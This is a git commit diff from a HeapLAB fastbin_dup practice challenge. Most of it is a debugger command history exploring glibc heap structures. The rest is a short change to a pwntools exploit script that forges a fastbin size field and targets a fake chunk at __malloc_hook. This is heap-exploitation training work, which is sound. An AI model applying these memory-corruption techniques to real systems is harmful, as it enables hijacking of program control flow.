summaryrefslogtreecommitdiff
path: root/HeapLAB/challenge-fastbin_dup
diff options
context:
space:
mode:
Diffstat (limited to 'HeapLAB/challenge-fastbin_dup')
-rw-r--r--HeapLAB/challenge-fastbin_dup/.gdb_history426
-rwxr-xr-xHeapLAB/challenge-fastbin_dup/bruh.py7
2 files changed, 217 insertions, 216 deletions
diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history
index b2cbfcb..4933f78 100644
--- a/HeapLAB/challenge-fastbin_dup/.gdb_history
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@@ -1,256 +1,256 @@
+c
+x 0x7f4854db6b40
+c
+x 0x7f4854db6b40
+x main_arena
x &main_arena
-x/100x &main_arena
-print main_arena
-fastbins
+x &__malloc_hook
+x main_arena.top
+db main_arena.top
+c
+c
+c
q
-fastbins
+print __malloc_hook
+print __malloc_hook
fastbins
c
-exit
-quit
-quit
fastbins
-print main_arena
-q
-print main_arena
-q
+c
vis_heap_chunks
-print main_arena
-db main_arena
-db &main_arena
-db &main_arena/100
-db &main_arena 100
-db &main_arena 1000
-x main_arena.top
-x &main_arena.top
-db &main_arena 100
c
fastbins
-print main_arena
-x main_arena.fasbinsY
-x &main_arena.fastbinsY
-quit
-fastbins
-x 0x7f0946700b70
-db 0x7f0946700b70 100
-q
-fastbins
-q
+r
+c
fastbins
-q
-fastbinsx
-db &main_arena 100
-q
-db 0x7f2e5c845b60
-0x7f2e5c845b70 + 16
-x 0x7f2e5c845b70 + 16
-x 0x7f2e5c845b70
-x 0x7f2e5c845b70
-x 0x7f2e5c845b60
-vis_heap_chunks
-db 0x7f0ba6e3db70
-db 0x555bdeaca000 100
-db 0x7f0ba6e3db70
-db 0x7f0ba6e3db70 - 8
-db 0x7f0ba6e3db70-8
-db 0x7f0ba6e3db70-7
-q
-x 0x7fcf882cbb69
-db 0x7fcf882cbb69
-q
-vis_heap_chunks
-print main_arena
-q
print main_arena
-vis_heap_chunks
-q
-print main_arena
-q
-print main_arena
-fastbins
-r
-q
-r
+vis_heap
c
-fastbisn
-vis_heap_chunks
fastbins
-quit
fastbins
-print main_arena
c
-print main_arena
-q
-print main_arena
-print main_arena
-x malloc_free_hook
-x __free_hook
-x &__free_hook
-x &__free_hook 100
-db &__free_hook 100
-q
-q
-q
-q
-print main_arena
-db 0x7f4858584e10
-c
-print victim
-q
fastbins
+r
c
-x idx
-x chunksize(p)
-x chunksize
-x p
-fastbins
+ quit
+db main_arena
+db &main_arena.fastbinsY
q
-x __free_hook
-x &__free_hook 100
-db &__free_hook 100
-db &__free_hook - 100
-db &__free_hook-100
-db &__free_hook-100 100
-print main_arena
-x 0x7fca0f75fe10
-x/100 0x7fca0f75fe10
-x/100 0x7fca0f75fe10-100
+r
c
-q
-break malloc
c
fastbins
-x __free_hook
-fastins
-fastbins
-print main_arena
-x 0x7f072b59ee10
-break malloc
-break free
-continue
-c
-c
+print &main_arena
+print main_arena
c
print main_arena
-vis_heap_chunks
-vis_heap_chunks
+db main_arena
+db &main_arena
+db &main_arena/100
+db &main_arena 100
+db &main_arena 1000
+q
+db main_arena.bins
+db &main_arena.fastbinsY
+run
c
-vis_heap_chunks
-break free
-break malloc
c
-print main_arena
-x &__free_hook - 16
q
-print main_arena
-vis_heap_chunks
+r
c
+fastbins
c
+fastbins
c
-q
-db __malloc_hook
-db &__malloc_hook
-x __malloc_hook
-x &__malloc_hook
+fastbins
+r
c
-break sysmalloc
c
-frame 2
-context
+r
+1
c
-break main
c
-q
-x &__malloc_hook
-print __malloc_hook
-print &__malloc_hook
-print __main_arena
print main_arena
-print main_arena
x __malloc_hook
x &__malloc_hook
-db &__malloc_hook
-db &__malloc_hook-100 100
-db &__malloc_hook-100 100*8
-db &__malloc_hook-100 (100*8)+1
-fastbins
-c
+x 0x7ffff7dd0bc0
+x &main_arena
+q
+print &main_arena
+print main_arena
+db main_arena
+db &main_arena 100
print main_arena
-x __malloc_hook
-x &__malloc_hook
-db &__malloc_hook-100 (100*8)+1
-c
-db &__malloc_hook-100 (100*8)+1
+print &main_arena
+db &main_arena
+db &main_arena + 1
+db &main_arena+1
+find_fake_fast main_arena.fastbinsY
+find_fake_fast &main_arena.fastbinsY
+x &main_arena.fastbinsY
+db main_arena
+db &main_arena
+db &main_arena+1
+db &main_arena+0
+dq &main_arena+0
+dq &main_arena+1
+x/x 00007fc130a1cb60
+x/x 0x00007fc130a1cb60
+x/x 0x7fc130a1cb69
+x main_arena
+x &main_arena
+x 0x0x7fc130a1cb68
+x 0x7fc130a1cb68
+x 0x7fc130a1cb68+1
+x/10x 0x7fc130a1cb68+1
+x/10x 0x7fc130a1cb68+0
+x/10x 0x7fc130a1cb68+1
+x/10x 0x7fc130a1cb69
+db 0x7fc130a1cb69
+db 0x7fc130a1cb71
+db 0x7fc130a1cb70
+x main_arena
+print &main_arena
+db &main_arena+1
+dq &main_arena+1
+q
+x 0x7f7151e3cb70
+db 0x7f7151e3cb70
+db main_arena
+db &main_arena
print main_arena
-x 0x7f5b07a18b40
-break malloc
-c
-c
-c
+x main_arena
+print &main_arena
+db 0x7f7151e3cb69
+db 0x7f7151e3cb68
+db 0x7f7151e3cb67
+db 0x7f7151e3cb68
+db 0x7f7151e3cb69
+dq 0x7f7151e3cb69
+db 0x7f7151e3cb69
+db 0x7f7151e3cb67
+db 0x7f7151e3cb69
+db 0x7f7151e3cb68
+find_fake_fast main_arena
+find_fake_fast &main_arena
+db 0x7f7151e3cb68
+db 0x7f7151e3cb69
+db 0x7f7151e3cb67
+db 0x7f7151e3cb68
+db 0x7f7151e3cb70
+db 0x7fc130a1cb69
+db 0x7f7151e3cb70
+db 0x7f7151e3cb69
+find_fake_fast &__free_hook
+find_fake_fast &__realloc_hook
+find_fake_fast &__memalign_hook
+find_fake_fast &__malloc_initialize_hook
+find_fake_fast &__after_morecore_hook
+find_fake_fast q
q
-break __libc_malloc
-break malloc
-break __malloc_hook
-b __malloc_hook
-b &__malloc_hook
-b *__malloc_hook
-b *&__malloc_hook
-c
-delete 3
-c
-pwndbg heap
-vis_heap_chunks
-print __mallinfo
-x __mallinfo
-print &__mallinfo
-print *__mallinfo
-print __mallinfo
-print &__mallinfo
+quit
+q
+fastbins
+c
+frame 4
+context code
+x 0x7fd533e9cb68
+db 0x7fd533e9cb68
+x fastbins
+print main_heap
+print &main_heap
+print &main_arena
print main_arena
-c
-break malloc
-c
-x main_arena.top_check
-x main_arena.top_chunk
+db 0x7fee89f0ee10
+db 0x7fee89f0ee10 10
+db 0x7fee89f0ee10 48
+db 0x7fee89f0ee10-3 48
+db 0x7fee89f0ee10-3 (16*4)
+db 0x7fee89f0ee10
+db 0x7fee89f0ee10 - 1
+db 0x7fee89f0ee10-1
+db 0x7fee89f0ee10-1 1
+db 0x7fee89f0ee10-1 32
+db 0x7fee89f0ee10-1 (48)
+db 0x7fee89f0ee10-1 (48 * 3)
+db 0x7fee89f0ee10-1 (48*3)
+db 0x7fee89f0ee10-1
+db 0x7fee89f0ee10
+q
print main_arena
-x 0x7f4854db6b40
-x 0x7f4854db6b40
-x 0x7f4854db6b40
+x 0x7fdb92f8ee10
c
-x 0x7f4854db6b40
-fastbins
-c
-x 0x7f4854db6b40
-c
-x 0x7f4854db6b40
-x main_arena
-x &main_arena
+find_fake_fast &malloc_hook
+find_fake_fast &__malloc_hook
+x __malloc_hook
x &__malloc_hook
-x main_arena.top
-db main_arena.top
-c
-c
-c
-q
-print __malloc_hook
-print __malloc_hook
-fastbins
-c
-fastbins
-c
-vis_heap_chunks
-c
-fastbins
-r
-c
-fastbins
+x &__malloc_hook
+x &__malloc_hook - 16
+x &__malloc_hook
+db &__malloc_hook-100
+db &__malloc_hook-100 100
+db &__malloc_hook-1
+db &__malloc_hook
+db &__malloc_hook-48 48
+db &__malloc_hook-48 48 * 8
+db &__malloc_hook-48 48*8
+db &__malloc_hook-48*8 48
+db &__malloc_hook-80*8 80
+db &__malloc_hook-160*8 80
+db &__malloc_hook-160 80
+db -h
+db &__malloc_hook
+x __malloc_hook
+x &__malloc_hook
+x __malloc_hook-100
+x &__malloc_hook-100
+x &__malloc_hook-100 100
+x &__malloc_hook-100 100
+db &__malloc_hook-100 100
+db &__malloc_hook-100 100*8
+print (void*)&malloc_hook
+print (void*)&__malloc_hook
+db &__malloc_hook-100 101*8
+db &__malloc_hook-100 101*8
+db &__malloc_hook-100 100*8
+db &__malloc_hook-100
+db &__malloc_hook-(16*9)
+db &__malloc_hook-(16*9) 16*9
+db &__malloc_hook-(10) (10*16)
+db &__malloc_hook-(10) (10*8)
+db &__malloc_hook-(1) (10*8)
+db &__malloc_hook-(11
+db &__malloc_hook
+db &__malloc_hook-1
+db &__malloc_hook-8
+db &__malloc_hook
+db &__malloc_hook-32
+db &__malloc_hook-(32/8)
+db &__malloc_hook-(32/8) 1
+db &__malloc_hook-(32/8) 10
+db 0x7f5575614b2a 1
+db 0x7f5575614b2a
+db 0x7f5575614b20
+db &__malloc_loc
+db &__malloc_hook-(16) (16*8)
+print (void*)__malloc_hook
+print (void*)&__malloc_hook
+db 0x7f5575614b36
+0x7f5575614b2a
+find_fake_fast
+find_fake_fast &__malloc_hook
+print (void*)&__malloc_hook
+exit
+quit
print main_arena
-vis_heap
-c
-fastbins
-fastbins
-c
-fastbins
-r
-c
- quit
+x 0x7f265fd4cb2d
+x 0x7f265fd4cb2d
+db 0x7f265fd4cb2d
+print (void*)&__malloc_hook
+find_fake_fast &__malloc_hook
+db 0x7f265fd4cb2d
+db 0x7f265fd4cb2d - 1
+db 0x7f265fd4cb2d-1
+db
+c
+db &__malloc_hook-(16) (16*8)
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
index 191cbea..56b0c71 100755
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -55,7 +55,7 @@ free(chunk1)
#malloc(24, p64(libc.sym.main_arena + 96))
#this sets up a fake size field in the fastbins
-malloc(24, p64(0x81))
+malloc(24, p64(0x80))
malloc(24, 'asdf')
malloc(24, 'asdf')
@@ -74,9 +74,10 @@ malloc(119, 'sdfg')
#8 * 9
-malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16))
+payload_loc = libc.sym.__malloc_hook - 35
+malloc(119, p64(0)*9 + p64(payload_loc))
-print(hex(fake_chunk_loc))
+print("top chunk addr: {}".format(hex(payload_loc)))
# =============================================================================